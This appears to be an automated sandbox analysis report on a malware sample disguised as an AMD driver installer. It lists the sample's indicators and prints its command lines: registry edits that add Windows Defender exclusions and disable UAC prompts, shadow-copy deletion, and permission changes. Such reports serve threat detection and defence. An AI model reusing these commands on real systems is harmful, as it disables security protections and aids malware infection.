Analysis
-
max time kernel
157s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2022 16:15
Static task
static1
Behavioral task
behavioral1
Sample
AMD-drivers-2.0.7.exe
Resource
win7-20220812-en
General
-
Target
AMD-drivers-2.0.7.exe
-
Size
265.0MB
-
MD5
4d3bb85589bad628d92b79b17cf5e87e
-
SHA1
152d6b37b605255a3f7b71e416af6eed1682818a
-
SHA256
ca15402e6141c7ae941aeed7ff80933c814bce7ca007fb237b7b61c93f3bb338
-
SHA512
67b4fc2dcb3aeb1b355d9c34b3e46948c868a27db07cce534dd5fb4b2c376206b10bd21be016755b1e20efd51f9b903b3b11cdcc963df23e5d4692a2f8e6f94c
-
SSDEEP
393216:GKVaRkwboTiwguCPAGlEt883Zr1KCAKmvumolJ5j:dabbO2/DEesmCAKmv4j5j
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\software\microsoft\windows defender security center\notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications\disableenhancednotifications = "1" reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
svchost.exedescription pid process target process PID 2628 created 2232 2628 svchost.exe r.exe PID 2628 created 1660 2628 svchost.exe r.exe PID 2628 created 3836 2628 svchost.exe r.exe PID 2628 created 4580 2628 svchost.exe r.exe PID 2628 created 3056 2628 svchost.exe r.exe PID 2628 created 2696 2628 svchost.exe r.exe PID 2628 created 4492 2628 svchost.exe r.exe PID 2628 created 3204 2628 svchost.exe r.exe PID 2628 created 796 2628 svchost.exe r.exe PID 2628 created 1068 2628 svchost.exe r.exe -
Processes:
reg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioruser = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" reg.exe -
Processes:
reg.exereg.exereg.exereg.exereG.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\pathS\C:\Windows\sySteM32\driVerS\eTc\hoStS = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\eXteNSIoNs reg.exe Key created \REGISTRY\MACHINE\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\eXteNSIoNs\cmd = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\eXteNSIoNs\exe = "0" reG.exe Key created \REGISTRY\MACHINE\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns reG.exe Key created \REGISTRY\MACHINE\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS reg.exe Key created \REGISTRY\MACHINE\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\eXteNSIoNs\dll = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\eXteNSIoNs\scr = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS reg.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables use of System Restore points 1 TTPs
-
Drops file in Drivers directory 1 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Executes dropped EXE 23 IoCs
Processes:
AMD-drivers-2.0.7.tmpAMD-drivers-2.0.7.tmpr.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exeobs64.exeobs64.tmpr.exeobs64.exeobs64.tmpobs64.scrobs64.sCrpid process 4548 AMD-drivers-2.0.7.tmp 4964 AMD-drivers-2.0.7.tmp 2232 r.exe 1660 r.exe 3836 r.exe 984 r.exe 4580 r.exe 3056 r.exe 4152 r.exe 2696 r.exe 4492 r.exe 928 r.exe 3204 r.exe 796 r.exe 4104 r.exe 1068 r.exe 3236 obs64.exe 1140 obs64.tmp 1448 r.exe 4228 obs64.exe 4212 obs64.tmp 4268 obs64.scr 2120 obs64.sCr -
Possible privilege escalation attempt 5 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 4576 takeown.exe 4024 icacls.exe 4420 icacls.exe 996 icacls.exe 5104 icacls.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
AMD-drivers-2.0.7.tmpWScript.exeobs64.tmpobs64.sCrdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation AMD-drivers-2.0.7.tmp Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation obs64.tmp Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation obs64.sCr -
Drops startup file 1 IoCs
Processes:
AMD-drivers-2.0.7.tmpdescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBS.lnk AMD-drivers-2.0.7.tmp -
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 4740 rundll32.exe 2084 rundll32.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 4576 takeown.exe 4024 icacls.exe 4420 icacls.exe 996 icacls.exe 5104 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
obs64.scrpid process 4268 obs64.scr 4268 obs64.scr -
Suspicious use of SetThreadContext 1 IoCs
Processes:
obs64.scrdescription pid process target process PID 4268 set thread context of 2120 4268 obs64.scr obs64.sCr -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 4120 vssadmin.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3668 taskkill.exe 3000 taskkill.exe 1460 taskkill.exe -
Modifies data under HKEY_USERS 25 IoCs
Processes:
r.exer.exer.exer.exer.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" r.exe -
Suspicious behavior: EnumeratesProcesses 50 IoCs
Processes:
AMD-drivers-2.0.7.tmpr.exer.exer.exer.exer.exer.exer.exer.exer.exer.exeobs64.tmpobs64.scrpowershell.exepowershell.exepid process 4964 AMD-drivers-2.0.7.tmp 4964 AMD-drivers-2.0.7.tmp 2232 r.exe 2232 r.exe 2232 r.exe 2232 r.exe 1660 r.exe 1660 r.exe 1660 r.exe 1660 r.exe 3836 r.exe 3836 r.exe 3836 r.exe 3836 r.exe 4580 r.exe 4580 r.exe 4580 r.exe 4580 r.exe 3056 r.exe 3056 r.exe 3056 r.exe 3056 r.exe 2696 r.exe 2696 r.exe 2696 r.exe 2696 r.exe 4492 r.exe 4492 r.exe 4492 r.exe 4492 r.exe 3204 r.exe 3204 r.exe 3204 r.exe 3204 r.exe 796 r.exe 796 r.exe 796 r.exe 796 r.exe 1068 r.exe 1068 r.exe 1068 r.exe 1068 r.exe 4212 obs64.tmp 4212 obs64.tmp 4268 obs64.scr 4268 obs64.scr 864 powershell.exe 864 powershell.exe 2112 powershell.exe 2112 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
taskkill.exetakeown.exetaskkill.exer.exevssvc.exesvchost.exer.exer.exer.exer.exer.exer.exer.exer.exer.exetaskkill.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3000 taskkill.exe Token: SeTakeOwnershipPrivilege 4576 takeown.exe Token: SeDebugPrivilege 1460 taskkill.exe Token: SeDebugPrivilege 2232 r.exe Token: SeAssignPrimaryTokenPrivilege 2232 r.exe Token: SeBackupPrivilege 4092 vssvc.exe Token: SeRestorePrivilege 4092 vssvc.exe Token: SeAuditPrivilege 4092 vssvc.exe Token: SeIncreaseQuotaPrivilege 2232 r.exe Token: 0 2232 r.exe Token: SeTcbPrivilege 2628 svchost.exe Token: SeTcbPrivilege 2628 svchost.exe Token: SeDebugPrivilege 1660 r.exe Token: SeAssignPrimaryTokenPrivilege 1660 r.exe Token: SeIncreaseQuotaPrivilege 1660 r.exe Token: SeDebugPrivilege 3836 r.exe Token: SeAssignPrimaryTokenPrivilege 3836 r.exe Token: SeIncreaseQuotaPrivilege 3836 r.exe Token: 0 3836 r.exe Token: SeDebugPrivilege 4580 r.exe Token: SeAssignPrimaryTokenPrivilege 4580 r.exe Token: SeIncreaseQuotaPrivilege 4580 r.exe Token: SeDebugPrivilege 3056 r.exe Token: SeAssignPrimaryTokenPrivilege 3056 r.exe Token: SeIncreaseQuotaPrivilege 3056 r.exe Token: 0 3056 r.exe Token: SeDebugPrivilege 2696 r.exe Token: SeAssignPrimaryTokenPrivilege 2696 r.exe Token: SeIncreaseQuotaPrivilege 2696 r.exe Token: SeDebugPrivilege 4492 r.exe Token: SeAssignPrimaryTokenPrivilege 4492 r.exe Token: SeIncreaseQuotaPrivilege 4492 r.exe Token: 0 4492 r.exe Token: SeDebugPrivilege 3204 r.exe Token: SeAssignPrimaryTokenPrivilege 3204 r.exe Token: SeIncreaseQuotaPrivilege 3204 r.exe Token: SeDebugPrivilege 796 r.exe Token: SeAssignPrimaryTokenPrivilege 796 r.exe Token: SeIncreaseQuotaPrivilege 796 r.exe Token: 0 796 r.exe Token: SeDebugPrivilege 1068 r.exe Token: SeAssignPrimaryTokenPrivilege 1068 r.exe Token: SeIncreaseQuotaPrivilege 1068 r.exe Token: SeDebugPrivilege 3668 taskkill.exe Token: SeDebugPrivilege 864 powershell.exe Token: SeDebugPrivilege 2112 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
AMD-drivers-2.0.7.tmpobs64.tmppid process 4964 AMD-drivers-2.0.7.tmp 4212 obs64.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
obs64.scrpid process 4268 obs64.scr -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
AMD-drivers-2.0.7.exeAMD-drivers-2.0.7.tmpcmd.exeAMD-drivers-2.0.7.exeAMD-drivers-2.0.7.tmprundll32.exeWScript.execmd.exedescription pid process target process PID 2000 wrote to memory of 4548 2000 AMD-drivers-2.0.7.exe AMD-drivers-2.0.7.tmp PID 2000 wrote to memory of 4548 2000 AMD-drivers-2.0.7.exe AMD-drivers-2.0.7.tmp PID 2000 wrote to memory of 4548 2000 AMD-drivers-2.0.7.exe AMD-drivers-2.0.7.tmp PID 4548 wrote to memory of 4912 4548 AMD-drivers-2.0.7.tmp cmd.exe PID 4548 wrote to memory of 4912 4548 AMD-drivers-2.0.7.tmp cmd.exe PID 4548 wrote to memory of 4912 4548 AMD-drivers-2.0.7.tmp cmd.exe PID 4548 wrote to memory of 5068 4548 AMD-drivers-2.0.7.tmp AMD-drivers-2.0.7.exe PID 4548 wrote to memory of 5068 4548 AMD-drivers-2.0.7.tmp AMD-drivers-2.0.7.exe PID 4548 wrote to memory of 5068 4548 AMD-drivers-2.0.7.tmp AMD-drivers-2.0.7.exe PID 4912 wrote to memory of 3000 4912 cmd.exe taskkill.exe PID 4912 wrote to memory of 3000 4912 cmd.exe taskkill.exe PID 4912 wrote to memory of 3000 4912 cmd.exe taskkill.exe PID 5068 wrote to memory of 4964 5068 AMD-drivers-2.0.7.exe AMD-drivers-2.0.7.tmp PID 5068 wrote to memory of 4964 5068 AMD-drivers-2.0.7.exe AMD-drivers-2.0.7.tmp PID 5068 wrote to memory of 4964 5068 AMD-drivers-2.0.7.exe AMD-drivers-2.0.7.tmp PID 4964 wrote to memory of 4740 4964 AMD-drivers-2.0.7.tmp rundll32.exe PID 4964 wrote to memory of 4740 4964 AMD-drivers-2.0.7.tmp rundll32.exe PID 4964 wrote to memory of 4740 4964 AMD-drivers-2.0.7.tmp rundll32.exe PID 4740 wrote to memory of 2084 4740 rundll32.exe rundll32.exe PID 4740 wrote to memory of 2084 4740 rundll32.exe rundll32.exe PID 3088 wrote to memory of 3572 3088 WScript.exe cmd.exe PID 3088 wrote to memory of 3572 3088 WScript.exe cmd.exe PID 3572 wrote to memory of 604 3572 cmd.exe reg.exe PID 3572 wrote to memory of 604 3572 cmd.exe reg.exe PID 3572 wrote to memory of 1824 3572 cmd.exe reg.exe PID 3572 wrote to memory of 1824 3572 cmd.exe reg.exe PID 3572 wrote to memory of 5004 3572 cmd.exe reg.exe PID 3572 wrote to memory of 5004 3572 cmd.exe reg.exe PID 3572 wrote to memory of 664 3572 cmd.exe reg.exe PID 3572 wrote to memory of 664 3572 cmd.exe reg.exe PID 3572 wrote to memory of 2124 3572 cmd.exe reg.exe PID 3572 wrote to memory of 2124 3572 cmd.exe reg.exe PID 3572 wrote to memory of 380 3572 cmd.exe reg.exe PID 3572 wrote to memory of 380 3572 cmd.exe reg.exe PID 3572 wrote to memory of 4532 3572 cmd.exe reg.exe PID 3572 wrote to memory of 4532 3572 cmd.exe reg.exe PID 3572 wrote to memory of 4576 3572 cmd.exe takeown.exe PID 3572 wrote to memory of 4576 3572 cmd.exe takeown.exe PID 3572 wrote to memory of 4024 3572 cmd.exe icacls.exe PID 3572 wrote to memory of 4024 3572 cmd.exe icacls.exe PID 3572 wrote to memory of 1460 3572 cmd.exe taskkill.exe PID 3572 wrote to memory of 1460 3572 cmd.exe taskkill.exe PID 3572 wrote to memory of 4420 3572 cmd.exe icacls.exe PID 3572 wrote to memory of 4420 3572 cmd.exe icacls.exe PID 3572 wrote to memory of 4076 3572 cmd.exe reg.exe PID 3572 wrote to memory of 4076 3572 cmd.exe reg.exe PID 3572 wrote to memory of 1416 3572 cmd.exe reg.exe PID 3572 wrote to memory of 1416 3572 cmd.exe reg.exe PID 3572 wrote to memory of 2832 3572 cmd.exe reg.exe PID 3572 wrote to memory of 2832 3572 cmd.exe reg.exe PID 3572 wrote to memory of 2536 3572 cmd.exe reg.exe PID 3572 wrote to memory of 2536 3572 cmd.exe reg.exe PID 3572 wrote to memory of 1584 3572 cmd.exe reg.exe PID 3572 wrote to memory of 1584 3572 cmd.exe reg.exe PID 3572 wrote to memory of 1844 3572 cmd.exe reg.exe PID 3572 wrote to memory of 1844 3572 cmd.exe reg.exe PID 3572 wrote to memory of 1700 3572 cmd.exe reg.exe PID 3572 wrote to memory of 1700 3572 cmd.exe reg.exe PID 3572 wrote to memory of 3764 3572 cmd.exe reg.exe PID 3572 wrote to memory of 3764 3572 cmd.exe reg.exe PID 3572 wrote to memory of 3472 3572 cmd.exe reg.exe PID 3572 wrote to memory of 3472 3572 cmd.exe reg.exe PID 3572 wrote to memory of 4232 3572 cmd.exe reg.exe PID 3572 wrote to memory of 4232 3572 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-MF3GV.tmp\AMD-drivers-2.0.7.tmp"C:\Users\Admin\AppData\Local\Temp\is-MF3GV.tmp\AMD-drivers-2.0.7.tmp" /SL5="$200FE,13524617,160256,C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im obs64.scr4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe" /verysilent /sp-3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-VDUVT.tmp\AMD-drivers-2.0.7.tmp"C:\Users\Admin\AppData\Local\Temp\is-VDUVT.tmp\AMD-drivers-2.0.7.tmp" /SL5="$F01D6,13524617,160256,C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe" /verysilent /sp-4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\.cmd""5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exer.eXe /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exer.eXe /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exer.eXe /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exer.exe /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reG.exe"C:\Windows\system32\reG.exe" Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exer.eXe /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F9⤵
- Windows security bypass
-
C:\tmp\obs64.exe"C:\tmp\obs64.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-VG8Q1.tmp\obs64.tmp"C:\Users\Admin\AppData\Local\Temp\is-VG8Q1.tmp\obs64.tmp" /SL5="$80204,9334883,121344,C:\tmp\obs64.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr7⤵
-
